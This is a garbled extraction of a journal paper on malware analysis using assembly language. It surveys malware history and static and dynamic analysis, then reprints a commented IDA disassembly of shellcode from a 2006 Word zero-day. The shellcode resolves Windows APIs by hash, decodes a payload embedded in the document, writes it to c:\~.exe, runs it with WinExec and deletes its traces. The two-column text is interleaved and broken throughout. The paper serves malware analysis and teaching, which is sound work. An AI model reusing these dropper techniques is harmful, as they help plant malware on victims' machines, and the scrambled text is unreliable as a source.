Professional Documents
Culture Documents
1 IJAEST Volume No 2 Issue No 1 Malware Analysis Using Assembly Level Program 000 012
1 IJAEST Volume No 2 Issue No 1 Malware Analysis Using Assembly Level Program 000 012
1 IJAEST Volume No 2 Issue No 1 Malware Analysis Using Assembly Level Program 000 012
T
Abstract-Malware are exciting types of programs to experiment intrusive, or annoying software or program code. The term
with. One of the advantages of using assembly language is that computer virus" is sometimes used as a catch-all phrase to
you can both create and combat such programs. Generally, all include all types of malware, including true viruses.
ES
EFFECTIVE Malware are written in assembly language. It
would be difficult, if not impossible, to do this with other
languages (except for C); although it is quite easy to write a self-
reproducing program in any language. Viruses have been used
to kill other viruses. One could conceive of viruses and worms
that run around through a system carrying out useful tasks
Software is considered to be malware based on the
perceived intent of the creator rather than any particular
features. Malware includes computer viruses, worms, trojan
horses, spyware, dishonest adware, crimeware, most rootkits,
and other malicious and unwanted software. In law, malware
without direct intervention of particular users. The ability to is sometimes known as a computer contaminant, for instance
forensically analyze malicious software is becoming an in the legal codes of several U. S. states, including California
increasingly important discipline in the field of Digital and West Virginia. Malware is not the same as defective
A
Forensics. This is because malware is becoming stealthier, software, which is software that has a legitimate purpose but
targeted, profit driven, managed by criminal organizations, contains harmful bugs.
harder to detect and much harder to analyze. Malware analysis
Preliminary results from Symantec published in
requires a considerable skill set to look into deep malware
2008 suggested that "the release rate of malicious code and
internals when it is designed specifically to detect and hold back
other unwanted programs may be exceeding that of
IJ
for businesses operating on the Internet: the acknowledgment Another strictly for-profit category of malware has
that some sizable percentage of Internet customers will emerged in spyware -- programs designed to monitor user’s
always be infected for some reason or another, and that they web browsing, display unsolicited advertisements, or redirect
need to continue doing business with infected customers. The affiliate marketing revenues to the spyware creator. Spyware
result is a greater emphasis on back-office systems designed programs do not spread like viruses; they are, in general,
to spot fraudulent activities associated with advanced installed by exploiting security holes or are packaged with
malware operating on customers' computers. user-installed software, such as peer-to-peer applications.
On March 29, 2010, Symantec Corporation named The best-known types of malware, viruses and
Shaoxing, China as the world's malware capital. worms, are known for the manner in which they spread,
Sometimes, malware is disguised as genuine rather than any other particular behavior. The term computer
software, and may come from an official site. Therefore, virus is used for a program that has infected some executable
T
some security programs, such as McAfee may call malware software and that causes that when run; spread the virus to
"potentially unwanted programs" or "PUP". other executables. Viruses may also contain a payload that
Many early infectious programs, including the first performs other actions, often malicious. A worm, on the
Internet Worm and a number of MS-DOS viruses, were
ES other hand, is a program that actively transmits itself over a
written as experiments or pranks. They were generally network to infect other computers. It too may carry a
intended to be harmless or merely annoying, rather than to payload. These definitions lead to the observation that a virus
cause serious damage to computer systems. In some cases, requires user intervention to spread, whereas a worm spreads
the perpetrator did not realize how much harm their creations itself automatically. Using this distinction, infections
would do. transmitted by email or Microsoft Word documents, which
rely on the recipient opening a file or email to infect the
Young programmers learning about viruses and system, would be classified as viruses rather than worms.
A
their techniques wrote them for the sole purpose that they Before Internet access became widespread, viruses
could or to see how far it could spread. As late as 1999, spread on personal computers by infecting the executable
widespread viruses such as the Melissa virus appear to have boot sectors of floppy disks. By inserting a copy of it into the
been written chiefly as pranks. machine code instructions in these executables, a virus causes
Hostile intent related to vandalism can be found in itself to be run whenever a program is run or the disk is
IJ
programs designed to cause harm or data loss. Many DOS booted. Early computer viruses were written for the Apple II
viruses, and the Windows ExploreZip worm, were designed and Macintosh, but they became more widespread with the
to destroy files on a hard disk, or to corrupt the file system by dominance of the IBM PC and MS-DOS system. Executable-
writing invalid data to them. Network-borne worms such as infecting viruses are dependent on users exchanging software
the 2001 Code Red worm or the Ramen worm fall into the or boot-able floppies, so they spread rapidly in computer
same category. Designed to vandalize web pages, worms hobbyist circles.
may seem like the online equivalent to graffiti tagging, with The first worms, network-borne infectious
the author's alias or affinity group appearing everywhere the programs, originated not on personal computers, but on
worm goes. multitasking UNIX systems. The first well-known worm was
the Internet Worm of 1988, which infected SunOS and VAX
BSD systems. Unlike a virus, this worm did not insert itself It is undeniable that there is a digital arms race
into other programs. Instead, it exploited security holes between malware developers and malware researchers. As
(vulnerabilities) in network server programs and started itself soon as a technique is developed by one side, the other side
running as a separate process. This same behavior is used by implements a counter measure. Two of the major trends are
today's worms as well. that attackers are increasingly motivated by financial gain
and that there are indications that malware development is
With the rise of the Microsoft Windows platform in becoming increasingly commercialized and developed by
the 1990s, and the flexible macros of its applications, it professionals with extensive software engineering abilities.
became possible to write infectious code in the macro Another trend is that malware has an increasing variety of
language of Microsoft Word and similar programs. These techniques available to hinder the forensic analyst. This can
macro viruses infect documents and templates rather than include detection of the tools used by the forensic analyst and
T
applications (executables), but rely on the fact that macros in prevention of analysis via anti-debugging, anti-disassembly,
a Word document are a form of executable code. anti-emulation, anti-memory dumping, incorporation of fake
signatures and code obfuscation.
Today, worms are most commonly written for the
ES
Windows OS, although a few like Mare-D and the Lion Signature based detection of malware is dependent
worm are also written for Linux and UNIX systems. Worms upon an analyst having already analyzed the malware and
today work in the same basic way as 1988's Internet Worm: extracted a signature as well as the end user having updated
they scan the network and leverage vulnerable computers to their malware signature file.
replicate. Because they need no human intervention, worms
can spread with incredible speed. Although these techniques go some way in
protecting a system they are far from infallible and only of
A
2. INTRODUCTION minor assistance to the forensic analyst, especially if the
Malware as “software whose intent is malicious, or malware is new or has been customized. The increasing
whose effect is malicious”. Analysis of malicious software is availability of high speed network Internet connections has
essential for computer security professionals and digital also enabled the rapid production and dissemination of the
forensic analysts and is emerging as an important field of malware. All of these factors are contributing to increasing
IJ
research. Malware is often targeted at organizations and is numbers of network borne malware with respect to volume,
increasingly using anti-forensics techniques to prevent variety and complexity. Security professionals in the field
detection and analysis. Commercial Anti-Virus (AV) need to know how to determine if they are the target of an
software is often limited in its ability to detect and remove attack and how to eradicate or mitigate threats from their
malware. It is highly unlikely to detect new malware that is systems. This process of threat reduction can be assisted if
unleashed on the internet, corporate intranet or that has been security professionals have up to date methodologies and
customized to target specific networks. It is also unlikely to skill sets at their disposal.
detect malware that has been customized to target specific
networks.
3. THE PROBLEM WITH MALWARE ANALYSIS Dynamic analysis, in contrast, does run the code and the
The spectrum of malware that represents a real analyst observes its behavior and interaction with the host
threat is expansive. A non exhaustive list includes root kits, and network via mechanisms such as registry, file and
worms, bots, trojans, logic bombs, viruses, phishing, spam, network monitoring tools. This technique is generally much
spyware, adware, key loggers and backdoors. No computing easier to conduct than static analysis but is also easily
platform or environment is immune to these threats. hindered by malware that can detect the use of an emulation
Traditionally, malware is thought of as a virus or worm that environment such as VMware or the use of debugging tools
has a single function or payload. The resulting such as IDA Pro. By detecting the use of these tools and
countermeasure for traditional malware has been the environments, the malware can change its behavior. Once
employment of a removal tool that was initiated by signature detected, the malware can decide not to run its true payload
detection or by recognition of heuristics defined by specific and can run in a deceptive mode that makes it look like much
T
behaviors. These tended to be like the malware they were less of a threat.
responding to in that they were unitary or singular in purpose. It can delete itself together with any evidence, or if
Modern network borne malware is increasingly it is running with the appropriate privileges, damage or
multi-partite in nature incorporating several infection vectors
ES destroy the system that it is being run on or attached uses an
and possible payloads in the one instance. Signature based iterative and recursive technique that incorporates both the
systems that rely on file hashing or similar functions that static and dynamic analysis techniques to extract the full
uniquely identify malware based on file contents are functionality of the code in a recursive and iterative
increasingly failing due to the mass customization allowable technique that spirals into the analysis from the higher level
with the use of frameworks .Furthermore, anti-forensic view to the more detailed view. This technique also
techniques are widely deployed to obfuscate infection, hinder facilitates the opportunity to discover and mitigate anti
detection and retard eventual removal of the malware. This forensic techniques as the analysis process proceeds.
A
increasing complexity and entropy makes modern malware
analysis a significant undertaking that takes considerable 4. ANALYSIS PROCESS
time, expertise and requires an extensive knowledge domain A high level and simplistic view of the malware
either in an individual or in coverage provided by a team of analysis process is depicted in figure 1 below. It shows
analysts. malware as one of two inputs to the analysis methodology
IJ
Two fundamental techniques available to the analyst process which produces a report as an output. The generated
are static and dynamic analysis. Static analysis does not results also feedback into the analysis methodology via an
execute the code and the code is analyzed via disassemblies, assessment process which can be used to adjust the
call graphs, searches for strings, library calls, and methodology dynamically, or as a process improvement
reconstruction of data structures, enumerations and unions mechanism. Legal and ethical constraints serve as a bounding
within the code. This analysis technique is very time constraint to the process.
consuming and easily hindered by anti-forensics in the form
of code obfuscation, packers and protectors which are
increasingly being used by malware authors.
T
scripting and even assembly language programming are successful dissection and analysis of the malware. The skills
important skills required to understand how malware is needed to perform competent analysis are profound, highly
implemented and how it takes advantage of vulnerabilities. It technical and are at the cutting edge of computer science.
is also an important skill set for the development of
ES A surplus of tools are available to the analyst
customized tools and for scripting disassemblers and including debuggers, disassemblers, de-compilers, memory
debuggers. The poser of being able to script debuggers and dumpers, unpackers as well as many other tools common to
disassemblers should not be underestimated in a malware the discipline of software engineering. All of these tools
analysis context. Many analysis tools now also allow require niche expertise and a thorough understanding of the
additional functionality to be added by allowing users to principles of their operation and the computers they execute
write customized Dynamic Link Library (DLL) plugins or on. However, whether or not the tools are forensically sound
scripting languages such as IDA Python which integrates and their use acceptable in a court of law is a matter that
A
IDA Pro scripting with the Python scripting language. needs to be seriously considered.
detection software and techniques. Therefore, it is imperative forensically sound without considerable validation or black
that a malware analyst also be well versed in cutting edge box testing. Such tools could contain trojans and could easily
technologies and techniques. hide a malicious purpose. They may not be forensically
acceptable without significant due diligence on the part of the
5. MALWARE ANALYSIS person or organizations using these types of tools. Other
An adaptive, eclectic choice of techniques is software cracking or reverse engineering sites have scripts
required for analysis of malware. Various frameworks and for debuggers that can be easily and readily examined. These
methodologies such as static and dynamic analysis exist for scripts are useful to extract the known algorithm for dealing
the malware analyst to analyze malware such as with particular packers or to mitigate particular anti-forensic
techniques used by creators of such software.
seg000:00000000 ; +------------------------------------------------------------------
-------+
Analysis of malware will typically require
seg000:00000000 ;
configuring a complete virtual environment suitable for it to seg000:00000000 ; File Name : C:\Documents and
run in, not only from an operating systems perspective, but Settings\Administrator\Desktop\PLANNING REPORT 5-16-2006.doc
also the inclusion of network infrastructure and services. seg000:00000000 ; Format : Binary file
seg000:00000000 ; Base Address: 0000h Range: 0000h - 246F5h Loaded
Modern malware are increasingly network borne and network
length: 246F5h
enabled. So it may be necessary to provide an environment in seg000:00000000 ;
which the malware can utilize commonly used services such seg000:00000000 ; Authors: Michael Ligh and Ryan Smith
as Domain Name System (DNS) server, Simple Mail seg000:00000000 ;
seg000:00000000 ; This is a commented dissassembly of the Word 0-day
Transfer Protocol (SMTP) server or an Internet Relay Chat
released in
(IRC) server. Establishment of this style of environment
T
seg000:00000000 ; mid-late May 2006. This document does not describe the
allows for the malware initiating communications with these vulnerability
services to allow the dynamic capture of target data to assist seg000:00000000 ; or malware that results from an infection.
seg000:00000000 ;
in the dynamic analysis of malware.
seg000:00000000
seg000:00000000 ----------------------------------------------------------------------
isolation to prevent the spread of malware. -----
seg000:00000B2E
seg000:00000B2E ; The shellcode starts here. It uses Dino Dai
6. CODE
Zovi's PEB resolution method
seg000:00000B2E ; to load the base address of kernel32.dll. This
seg000:00000000 ;
information will be
seg000:00000000 ; +------------------------------------------------------------------
seg000:00000B2E ; used to locate the addresses of kernel32's
-------+
exports (because they
seg000:00000000 ; ¦ This file is generated by The Interactive
seg000:00000B2E ; are offsets from the base address).
Disassembler (IDA) ¦
seg000:00000B2E
seg000:00000000 ; ¦ Copyright (c) 2006 by DataRescue sa/nv,
seg000:00000B2E nop
<ida@datarescue.com> ¦
seg000:00000B2F nop
seg000:00000B30 mov eax, fs:off_30 ; load PEB address into seg000:00000B59 mov [edi+SCRATCH.String1], eax ; c:\~$
eax seg000:00000B5C add eax, 0Ch
seg000:00000B36 mov eax, [eax+0Ch] seg000:00000B5F mov [edi+SCRATCH.String2], eax ; c:\~.exe
seg000:00000B39 mov esi, [eax+1Ch] seg000:00000B62 add eax, 12h
seg000:00000B3C lodsd seg000:00000B65 mov [edi+SCRATCH.String3], eax ; c:\~.exe
seg000:00000B3D mov esi, [eax+8] ; kernel32.dll entry point seg000:00000B6B push edi ; saves the scratch pad for
seg000:00000B40 jmp loc_DAF use within loc_BA1
seg000:00000B40 seg000:00000B6C mov edi, esp
seg000:00000B40 ; At this point, the code jumps to loc_DAF, seg000:00000B6E xor edi, 0FFFFh
which immediately calls sub_B45. seg000:00000B74 dec edi
seg000:00000B40 ; In doing so, the call instruction sets EIP to seg000:00000B75 dec edi
0x00000DB4 (offset in seg000:00000B76 dec edi
seg000:00000B40 ; this file) and pushes it on the stack. Notably, seg000:00000B77
T
the first seg000:00000B77 ; The next instructions search memory for the
seg000:00000B40 ; instruction in sub_B45 is to pop this address original Word document's
into eax (see below) seg000:00000B77 ; own filename. The last mov (above) places the
seg000:00000B40 esp pointer into edi.
seg000:00000B45 seg000:00000B77 ; The loop works by reading a dword from edi
seg000:00000B45 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
seg000:00000B45
seg000:00000B45
seg000:00000B45
which EIP points
S U B R OES U T I N
T
seg000:00000BA1 ; the pointer to the structure's first member, so seg000:00000BEA push 10FA6516h ; ReadFile
all [edi+xyz] are seg000:00000BEF call resolve_func
seg000:00000BA1 ; references to the additional members. The seg000:00000BF4 mov [edi+SCRATCH.pReadFile], eax
loop here consists of seg000:00000BF7 push dword ptr [edi+8]
seg000:00000BA1 ; pushing two parameters on the stack - a seg000:00000BFA push 0E80A791Fh ; WriteFile
dword hash of the function name
seg000:00000BA1
imports) and the
seg000:00000BA1
calls resolve_func
seg000:00000BA1
ES
; (probably hashed to obfuscate the functions it
[edi+SCRATCH.pDeleteFileW], eax
file). When complete, seg000:00000C17 push dword ptr [edi+8]
seg000:00000BA1 ; the code knows exactly where to find all the seg000:00000C1A push 76DA08ACh ; SetFilePointer
system resources and seg000:00000C1F call resolve_func
seg000:00000BA1 ; functions it needs. seg000:00000C24 mov [edi+SCRATCH.pSetFilePointer], eax
A
seg000:00000BA1 ; seg000:00000C27 push dword ptr [edi+8]
seg000:00000BA1 ; Note the xyz field in all the [edi+xyz] seg000:00000C2A push 0E8AFE98h ; WinExec
operands are natively seg000:00000C2F call resolve_func
seg000:00000BA1 ; numerical. My co-worker Ryan reversed the seg000:00000C34 mov [edi+SCRATCH.pWinExec], eax
resolve_func sub routine seg000:00000C37 push dword ptr [edi+8]
IJ
seg000:00000BA1 ; and renamed them for readability. seg000:00000C3A push 99EC8974h ; CopyFileW
seg000:00000BA1 seg000:00000C3F call resolve_func
seg000:00000BA1 seg000:00000C44 mov [edi+SCRATCH.pCopyFileW], eax
seg000:00000BA1 loc_BA1: ; CODE XREF: seg000:00000C47 push dword ptr [edi+8]
sub_B45+56j seg000:00000C4A push 73E2D87Eh ; ExitProcess
seg000:00000BA1 dec esi seg000:00000C4F call resolve_func
seg000:00000BA2 dec esi seg000:00000C54 mov [edi+SCRATCH.pExitProcess], eax
seg000:00000BA3 pop edi seg000:00000C54
seg000:00000BA4 mov [edi+SCRATCH.szDOCFILENAME], seg000:00000C54 ; Delete any previously existing files of the
esi same name. Recall these are
seg000:00000BA7 push [edi+SCRATCH.hKernel32] seg000:00000C54 ; two of the three unicode file names discussed
seg000:00000BAA push 0C0397ECh ; GlobalAlloc earlier.
seg000:00000BAF call resolve_func seg000:00000C54
seg000:00000BB4 mov [edi+SCRATCH.pGlobalAlloc], eax seg000:00000C57 push [edi+SCRATCH.String2] ; c:\~.exe
T
seg000:00000C65 push [edi+SCRATCH.String1] ; c:\~$ c:\~$
seg000:00000C68 push [edi+SCRATCH.szDOCFILENAME] seg000:00000CA7 call [edi+SCRATCH.pReadFile]
seg000:00000C6B call [edi+SCRATCH.pCopyFileW] seg000:00000CAA push [edi+SCRATCH.field_4]
seg000:00000C6E seg000:00000CAD push 40h ; '@' ; allocate 40 bytes on
seg000:00000C6E ; The next 7 push instructions are preparing the heap
arguments for CreateFile.
seg000:00000C6E
already existing file (in
seg000:00000C6E
document now at c:\~$ after
seg000:00000C6E
ES
; Despite the function name, this only opens an
; CopyFile).
seg000:00000CAF
seg000:00000CB2
seg000:00000CB5
seg000:00000CB8
seg000:00000CBB
seg000:00000CBD
call
mov
mov
add
not
inc
[edi+SCRATCH.pGlobalAlloc]
[edi+SCRATCH.pMallocdBuff0], eax
ebx, [edi+SCRATCH.field_4]
ebx, 4
ebx
ebx
seg000:00000C6E seg000:00000CBE push 2 ; new offsets and starting loc
seg000:00000C6E push 0 seg000:00000CC0 push 0
seg000:00000C70 push 80h seg000:00000CC2 push ebx
seg000:00000C75 push 3 seg000:00000CC3 push [edi+SCRATCH.hInputFile]
A
seg000:00000C77 push 0 seg000:00000CC6 call [edi+SCRATCH.pSetFilePointer]
seg000:00000C79 push 0 seg000:00000CC9 push 0
seg000:00000C7B push 80000000h seg000:00000CCB lea ebx, [edi+SCRATCH.endMarker]
seg000:00000C80 push [edi+SCRATCH.String1] ; c:\~$ seg000:00000CD1 push ebx
seg000:00000C83 call [edi+SCRATCH.pCreateFileW] seg000:00000CD2 push [edi+SCRATCH.field_4]
IJ
T
seg000:00000CF4 ; At this point, the decoded payload exists on seg000:00000D4D call [edi+SCRATCH.pWinExec]
the heap. What to do with it? seg000:00000D50 push [edi+SCRATCH.String1] ; c:\~$
seg000:00000CF4 ; Write it to disk of course! And use the last seg000:00000D53 call [edi+SCRATCH.pDeleteFileW]
remaining unicode string as its seg000:00000D56 push 0
seg000:00000CF4 ; file name. seg000:00000D58 call [edi+SCRATCH.pExitProcess]
seg000:00000CF4
seg000:00000CF4
seg000:00000CF6
seg000:00000CFB
seg000:00000CFD
seg000:00000CFF
push 0
push 80h
push 2
push 0
push 0
ES seg000:00000D58 sub_B45
seg000:00000D58
seg000:00000D5B
seg000:00000D5B ;
¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
seg000:00000D5B
endp
¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E
T
seg000:00000D7F movsx edx, byte ptr [eax] seg000:00000DE1 db 0FFh
seg000:00000D82 cmp dh, dl seg000:00000DE2 db 0FFh
seg000:00000D84 jz short loc_D8E seg000:00000DE3 db 0FFh
seg000:00000D86 ror esi, 0Dh ; rotate right function seg000:00000DE4 endp
seg000:00000D89 add esi, edx
seg000:00000D8B
seg000:00000D8C
inc
jmp
eax
short loc_D7F
ES
seg000:00000D8E ; -------------------------------------------------------------------
--------
seg000:00000D8E
seg000:00000D8E loc_D8E: ; CODE XREF:
7. CONCLUSION
Malware analysis is becoming an important field of
specialization for forensic analysts. Authors of malware are
becoming increasingly profit driven and are incorporating
techniques to make their code as stealthy and undetectable as
resolve_func+29j
seg000:00000D8E cmp edi, esi
possible. Malware is being written by professional
seg000:00000D90 pop esi programmers who are very knowledgeable in their craft.
seg000:00000D91 jnz short loc_D78 They have a very good understanding of digital forensic
A
seg000:00000D93 pop edx
methods and endeavor to make forensic analysis as difficult
seg000:00000D94 mov ebp, ebx
seg000:00000D96 mov ebx, [edx+24h]
as possible.
seg000:00000D99 add ebx, ebp
seg000:00000D9B mov cx, [ebx+ecx*2] The knowledge domain required to competently
IJ
REFERENCES
[1].The Malware Analysis Body of Knowledge - Craig Valli
and Murray Brand.
[2].Reverse Engineering Malware - Lenny Zeltser .
[3].Malware analysis : An Introduction - Dennis Distler
[4].Introduction to Malware Analysis - Lenny Zeltser
[5].Practical Malware Analysis – Kris Kendall
Author Biography:
T
Mr S.MURUGAN is Working as ACTS Team Coordinator
, CDAC ,Bangalore.He received BSc in Physics from
Madurai Kamaraj University ,Madurai, in 1989 and MCA
degree in Computer Applications from Alagappa
University,Karaikudi,Tamilnadu ,India and MPhil(CS) from
Manonmaniam Sundaranar
ES
University,Tirunelveli,Tamilnadu,India . He has 17 years of
teaching and admin experience at PG level in the field of
Computer Science. He has published 6 papers in the National
conferences and 2 in International conference. His research
interests include: Intelligence Network Security Algorithms,
Malware prevention and Detection mechanism and
algorithm. He has published 8 books and courseware in the
field of Computer Science.